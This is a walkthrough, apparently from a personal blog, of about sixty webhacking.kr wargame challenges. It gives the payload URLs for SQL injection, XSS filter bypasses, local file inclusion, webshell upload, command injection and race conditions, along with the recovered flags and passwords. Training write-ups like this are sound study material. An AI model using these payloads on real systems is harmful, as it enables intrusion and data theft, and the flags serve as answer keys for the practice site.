Challenge 01
From the source code, we can see that if we set the cookie between 5 and 6, we can sovle it.
We set it to 5.5, and solve the challenge.
Challenge 02
In the page admin.php
There is a cookie called time
, it will give us different result in the source code with different value. If the value is true, it will give us 2070-01-01 09:00:01
, and 2070-01-01 09:00:00
for false.
It is a Cookie-based SQL injection, we can see if our command is true or false to find out the password of admin.php
First, we try to find the length of name of the database
And later, we can use substr
to find the name of the database. After that, we try to get the length of name of the table, and find the name of the table. Do the same thing with column, and find out its value.
I write a python script and found the database “chall2”, table “admin_area_pw”, column “pw”, and value “kudos_to_beistlab”.
After typing the password to admin.php
, we solve the challenge.
Challenge 03
We can solve the Nonogram.
And we get the following page.
We try to trigger sqli with name=answer value=1' or '1'='1
, and we accidently solve the challenge.
Challenge 04
We can create a table contains all hashes from 10000000 to 100000000, and find the hash in the table.
Challenge 05
I try to access https://webhacking.kr/challenge/web-05/mem/join.php
, and it worked.
After translation, we can see that we need to add cookie oldzombie=1
, and access
to get a sign up form.
We have to login as admin to pass the challenge, so we create our id with [space] + admin
, and we can login as admin.
Challenge 06
From the source code, we can see that it takes the value from cookie, do str_replace
, and do 20 times base64 decode. If the decode id is admin
, and decode pw is nimda
, we win this challenge.
Very straight forward, we just need to reverse the whole process and put the encoded value in cookies, and we are done.
Challenge 07
If there is 2
in our result, we can solve the challenge.
I focus on exploiting this page when rand=1
, which means I got 20% chance to succeed.
I access https://webhacking.kr/challenge/web-07/index.php?val=0)UNION(select(char(50))
, so that the sql query will be select lv from chall7 where lv=(0)UNION(select(char(50)))
, and the challenge is solved when rand=1
Challenge 08
With Burp Suite, we change user agent to User-Agent: a','1','admin')#
, so that the query agent=a, ip=1, id=admin
will be added.
Later, we create another request with User-Agent: a
, and we solve the challenge.
Challenge 09
We can use if
, length
, and substr
to find id
of no 3. However, =,>,<,%,ascii
are blocked, so we need to use in
or like
I write a script to find the password.
And we can get the password alsrkswhaql
Challenge 10
Modify left to 1599px, click once, and we can solve the challenge.
Challenge 11
In this one, we need to match the regular expression.
Access https://webhacking.kr/challenge/code-2/?val=1aaaaa_1.[my ip]%09p%09a%09s%09s
, and we solve the challenge.
Challenge 12
Javascript is encoded in Japanese style emotion, we can use aadecoder
to decode the script. And get
We can use the following script to see what ck
We can get the url https://webhacking.kr/challenge/code-3/youaregod~~~~~~~!.php
, and the challenge is solved.
Challenge 13
Challenge 14
It counts the index of “.kr” in url, and multiply with 30. If our input matches, it will multiply with our input and redirect.
Index of “.kr” is 18, 18 * 30 = 540, 540 * 540 = 291600, so if we access https://webhacking.kr/challenge/js-1/?291600
, we solve the challenge.
Challenge 15
When we access https://webhacking.kr/challenge/js-2/?getFlag
, we solve the challenge.
Challenge 16
When cd = 124
, it will do href. We can do it manually with https://webhacking.kr/challenge/js-3/%7c.php
, and we solve the challenge.
Challenge 17
Unlock will be 7809297.1, so we just need to access https://webhacking.kr/challenge/js-4/?780929.71
, and we solve the challenge.
Challenge 18
By testing, we know that id of guest is 1.
We can use https://webhacking.kr/challenge/web-32/index.php?no=3%09or%09no=2
to make the statement select id from chall18 where id='guest' and no=3 or no=2
, the first part will become false, turns to false or no=2, and it will be no=2. In the end, the statement will be select id from chall18 where no=2
. Since space is being filtered, we can use %09, which is tab, instead.
Challenge 19
We can access https://webhacking.kr/challenge/js-6/?id=ad%00min
to solve the challenge.
Challenge 20
We need to submit the correct captcha in 2 seconds. We can put the javascript in the console, press refresh, and execute the script immediately. Then we can pass the challenge.
Challenge 21
Challenge 22
First, we use join
to create an account with username abc
and password abc
After we login, we can see
We try to login with username admin
and nothing on password, and we get Login Fail!
, but if we login with username admin'&& 1=1#
and nothing on password, we get Wrong password!
We can use this to find out the password. I write a python script to check for the length of the password with username admin'&&LENGTH(pw)=1#
, if we get Wrong password!
, then the query is true.
After that, we use admin'&&SUBSTR(pw, 0, 1) = "a"#
to find out the value of the password.
Finally, we get a hash value of the password 6c9ca386a903921d7fa230ffa0ffc153
. If we decrypt 17becc424ea0fbf966f527d24635d4fa
, which is the hash we get with password abc
, we get abcapple
. When we decrypt 6c9ca386a903921d7fa230ffa0ffc153
, we get wowapple
, so the password should be wow
, and we can solve the challenge.
Challenge 23
It does a lot of filtering, but I found that by putting %00 between characters, we can pass the challenge. That is https://webhacking.kr/challenge/bonus-3/index.php?code=%3Cs%00c%00r%00i%00p%00t%00%3Ea%00l%00e%00r%00t(1); %3C/s%00c%00r%00i%00p%00t%3E
Challenge 24
Since it extract($_COOKIE), we can put $REMOTE_ADDR in the cookie. By setting $REMOTE_ADDR = 112277...00...00...1
as cookie, we can pass the filtering and get $REMOTE_ADDR =
Challenge 25
URL is http://webhacking.kr:10001/?file=hello
, but if we access http://webhacking.kr:10001/?file=flag
, we got FLAG is in the code
, if we access http://webhacking.kr:10001/?file=index
, we see nothing. It seems like it prints out the output of the file.
We can use http://webhacking.kr:10001/?file=php://filter/convert.base64-encode/resource=flag
to get the content of flag.php encoded in base64, when we decode it, we can see the flag.
Challenge 26
In this challenge, we need encode the message twice, so we can pass the filter and make id=admin
And we can get our twice encoded message %25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
, post it as id https://webhacking.kr/challenge/web-11/?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
, and we pass the challenge.
Challenge 27
By testing, we can know that the no of guest is 1.
We can access https://webhacking.kr/challenge/web-12/index.php?no=2)%09or%09id%09like%09%27admin%27%09--%09
to solve the problem because =
, #
, and blank are filtered out. We make the sql command to select id from chall27 where id='guest' and no=(2) or id like 'admin' -- or die("query error");
, the final command will be select id from chall27 where id like 'admin'
, and we solve the challenge.
Challenge 28
If we access flag.php
directly, we see nothing.
For this challenge, we need to upload .htaccess
contains php_flag engine off
. By doing this, it will not execute .php
file but show its content.
After uploading, access flag.php
And we can get the flag.
Challenge 29
Challenge 30
Challenge 31
It creates connection to random ports in range 10000 to 10100. We just need to do port forwarding and listen on that port, we can solve it.
Challenge 32
When we click the name, it will add 1, and we got a cookie vote_check = ok
. We need to delete it to vote again.
We can see that my name has 0 vote at the bottom. We use a python script to vote for 100 times.
And we solve the challenge.
Challenge 33
There are 10 small challenges, and each one looks like this. We have to pass each challenge by reading source code.
Use get method https://webhacking.kr/challenge/bonus-6?get=hehe
Paste a post form in HTML, and press submit.
Use get method with own ip https://webhacking.kr/challenge/bonus-6/33.php?myip=[my ip]
It puts time() on the webpage. We just need to do md5 encoding md5 -s 1575907840
and send it as password https://webhacking.kr/challenge/bonus-6/l4.php?password=dac6ecbe7ca8f5672f08c6698f34f882
First, we add cookie imcookie=1
and create a form to do post to a page with get parameter. Press submit.
Put cookie test = md5(ip address), put the form with value of md5(user agent), and submit.
Get rid of .
from my ip, and put it in get method.
https://webhacking.kr/challenge/bonus-6/wtff.php?[my ip]=[my ip]
By running the php script, we can get https://webhacking.kr/challenge/bonus-6/nextt.php?ans=acegikmoqsuwy
By running the php script, we can get https://webhacking.kr/challenge/bonus-6/answerip/26753767535_5350753507.php
Challenge 34
When we open the page, we get alert “debug me” and the source code above. We use jsnice.org
to give the code a better look, and there is one segment catching my attention.
Typing alert(b("0x1e", "14cN"));
in the console, and we get alert “debug me”.
Typing location[b("0x1c", "4c%d")]
, and we can get “https://webhacking.kr/challenge/js-7/".
Typing b("0x1d", "llaF")
, and we can get “./?Passw0RRdd=1”.
If we access https://webhacking.kr/challenge/js-7/?Passw0RRdd=1
, we can solve the challenge.
Challenge 35
What we need is to access https://webhacking.kr/challenge/web-17/index.php?phone=1),(%27admin%27,%27[my ip]%27,2&id=guest
, so that insert into chall35(id,ip,phone) values('{$_GET['id']}','{$_SERVER['REMOTE_ADDR']}',{$_GET['phone']})
will become insert into chall35(id,ip,phone) values('guest','[my ip]',1),('admin','[my ip]',2)
, and we solve the challenge.
Challenge 36
We can find the swap file in https://webhacking.kr/challenge/bonus-8/.index.php.swp
, and we can get the flag.
Challenge 37
Challenge 38
And there is a webpage https://webhacking.kr/challenge/bonus-9/admin.php
We need to have
put in the log, but we cannot input admin directly in the box, we will be denied.
I tried \n1.163.65.118:admin
, but it does not work. \n will be translate as string.
So, we can change <input type=text name=id size=20>
to <textarea type=text name=id size=20>
, and we have multi-line to type our inputs, we type
And we are admin and solve the challenge.
Challenge 39
If we take a closer look, we can see that we end up having a 1 single quote at the end of query, we need another single quote, but it will replace 1 with 2.
To solve this problem, we only need to submit “admin” with 9 blanks and a single quote
because we put single quote at the 15th character, even if it will be replace with 2, 1 got truncated with substr
, and we solve the challenge.
Challenge 40
are blocked, and ||,&
are fine.
If we access https://webhacking.kr/challenge/web-29/?no=0||id=0x61646d696e&id=guest&pw=guest
, we can see a login page for admin.
We can write a python script to find the length of the password and its content using LENGTH
We will get lck_admin
as our password, but we can see that we have lost one character, which is u
. That is because when we request for https://webhacking.kr/challenge/web-29/?no=0||SUBSTR(pw,2,1)=0x75&id=guest&pw=guest
, it will show us Success - guest
instead of the admin login page. The second character of both the admin’s password and guest’s password are the same.
So the real password is luck_admin
Challenge 41
Challenge 42
is base64 encode of test.txt
, so we execute echo -n "flag.docx" | base64
, and access https://webhacking.kr/challenge/web-20/?down=ZmxhZy5kb2N4
to download the flag, and the challenge is solved.
Challenge 43
If we upload the webshell directly, there is a warning “Wrong type”. We need to use Burp Suite to modify the type of the file from “text/php” to “text”.
Access http://webhacking.kr:10004/upload/webshell.php/?cmd=cat%20/flag
, and we can get the flag.
Challenge 44
From the hint, we know that we need to execute ls
. We can only type 5 characters for payload because of $id = substr($id,0,5);
We can use ';ls'
as payload, and it will execute echo 'hello! ';ls''
By accessing http://webhacking.kr:10005/flag_29cbb98dafb4e471117fec409148e9386753569e
, we can get the flag FLAG{y2u.be/sW3RT0tF020}
By the way, the song in the flag is really nice XDD
Challenge 45
First, %27
, which is a single quote, will be in trouble with addslashes()
. What we can do is to add %aa in front of it because %aa\
can be treated as a multi-byte single character, and %27
can be kept.
If we access https://webhacking.kr/challenge/web-22/?id=%aa' or id like 0x61646d696e%23&pw=a
, we can solve the challenge because the query select id from chall45 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')
will become select id from chall45 where id='%aa\' or id like 0x61646d696e%23' and pw=md5('a')
, which is select id from chall45 where id='%aa\' or id like 0x61646d696e
We get the result with id=admin
Challenge 46
We can access https://webhacking.kr/challenge/web-23/?lv=0%09OR%09id=char(97,100,109,105,110)
, so the sql query will become select id,cash from chall46 where lv=0 OR id=char(97,100,109,105,110)
. We can simplify this with select id,cash from chall46 where id='admin'
, and we solve the challenge.
Challenge 47
We need to access the content of the email.
First, we change <input type="text" name="subject" size="50" value="Flag of webhacking.kr old-47 chall" maxlength="50">
into <textarea type="text" name="subject" size="50" value="Flag of webhacking.kr old-47 chall" maxlength="50"></textarea>
, and type
And we can have get the email because it will cc to us.
Challenge 48
We can upload any file, access it, and delete it.
We upload a file called ;ls
, and when we delete it, it will trigger rm ;ls
, and we can get the flag FLAG{i_think_this_chall_is_cool}
Challenge 49
We can access https://webhacking.kr/challenge/web-24/?lv=0||id=0x61646d696e
to solve the challenge.
Challenge 50
We can access https://webhacking.kr/challenge/web-25/?id=%aa%27/*&pw=*/%09union%09select%093%23
to solve the challenge.
First, %27
, which is a single quote, will be in trouble with addslashes()
. What we can do is to add %aa in front of it because %aa\
can be treat as a multi-byte single character, and %27
can be kept.
The whole query is select lv from chall50 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')
, and it will become select lv from chall50 where id='%aa'/*' and pw=md5('*/%09union%09select%093%23')
, which is select lv from chall50 where id='%aa\'%09union%09select%093
, and we can solve the challenge.
Challenge 51
It uses raw hash, so we can use either 129581926211651571912466741651878684928
or ffifdyop
as our password. The sql command will be select id from chall51 where id='admin' and pw='T0Do#'or'8'
or select id from chall51 where id='admin' and pw=''or'6]!r,b
Challenge 52
Challenge 53
We can access https://webhacking.kr/challenge/web-28/?val=1%20procedure%20analyse()
, and we can get the output webhacking.chall53_755fdeb36d873dfdeb2b34487d50a805.a
, which is the database, table, and column.
Access https://webhacking.kr/challenge/web-28/?answer=chall53_755fdeb36d873dfdeb2b34487d50a805
, and we solve the challenge.
Challenge 54
The flag will show on the screen one character followed by another. All of a sudden, it finished, and only left a question mark.
By changing =
into +=
, we can see the whole flag printed on the screen.
We can get the flag FLAG{a7981201c48d0ece288afd01ca43c55b}
Challenge 55
If we access https://webhacking.kr/challenge/web-31/rank.php
We access https://webhacking.kr/challenge/web-31/rank.php?score=2147483647%20limit%202,1%20procedure%20analyse()
, and we can get id : webhacking.chall55.p4ssw0rd_1123581321
, and it contains the column name to store the flag p4ssw0rd_1123581321
We can get our flag with bruteforce. substr
is blocked, so we need to use another way, which is left
function. If we access https://webhacking.kr/challenge/web-31/rank.php?score=1
, we can get id : Milka // 1
, and if we access https://webhacking.kr/challenge/web-31/rank.php?score=1%20and%20left(p4ssw0rd_1123581321,1)%20like%200x46
, we can get id : Milka // 1
as well. We got the idea that the first character of the flag is F
, which we have already known.
I write a script to collect other characters in the flag.
Finally, we can get the flag FLAG{easy_peasy_lemon_squeezy!}
Challenge 56
For search, it will show if the content is in these two files. Since the second file contains hello~
, if I type h
or l
, it will show up. But if we try hl
, it won’t.
So first, we can see what characters contained in the target file.
We can get ch_list = ['a', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'k', 'l', 'm', 'n', 'o', 's', 't', 'u', 'y']
. Later, we use another script to test their combinations.
The output is FLAG{himiko_toga_is_cute_dont_you_think_so}
, but it seems there should be a question mark at the end FLAG{himiko_toga_is_cute_dont_you_think_so?}
Challenge 57
It uses GET method
We can write a script using if
and sleep
in mysql to determine the length of pw
, and we use substr
to find out its content.
And we can get the flag FLAG{y2u.be/kmPgjr0EL64}
, which is a nice song as well.
Challenge 58
We have a console, and we can type ls
to retrieve output.
If we type flag
, it says only admin can use this command.
Open Burp Suite, we can see that we sent 42["cmd","guest:flag"]
in our request, change it to 42["cmd","admin:flag"]
, and we solve the challenge.
Challenge 59
To join, it uses addslashes()
, strlen
and preg_match()
to do filtering.
We can join with id=nimda
and phone=1,reverse(id)),(1,1
, and the sql query insert into chall59 values('{$_POST['id']}',{$_POST['phone']},'guest')
will become insert into chall59 values('nimda',1,reverse(id)),(1,1,'guest')
, which is insert into chall59 values('nimda',1,'admin'),(1,1,'guest')
We login with lid=nimda
and lphone=1
, and we solve the challenge.
Challenge 60
This one is complicated. It writes $_SESSION['idx']
to ./readme/{$_SESSION['idx']}.txt
, sleep(1)
, and unlink the file. If we provide mode=auth
and $_SESSION['idx']
in ./readme/{$_SESSION['idx']}.txt
, we can solve the challenge.
That is, we need to access the file while sleep(1)
is executed. I open one normal tab and one incognito tab, and change both PHPSESSID
in cookie to numeric to bypass filtering. Set them to different value because if it is the same value, the second request will not start until the first request finished. The first one access the URL without auth, and the second one access it with auth, and we can solve the challenge.
Challenge 61
We can use alias
to solve this challenge.
It uses addslashes()
and preg_match()
to filter our input, so we cannot simply access https://webhacking.kr/challenge/web-38/?id=admin%20id
, we need to use hex representation.
If we access https://webhacking.kr/challenge/web-38/?id=0x61646d696e%20id
, we can solve the challenge.
Author L3o
LastMod 2020-01-23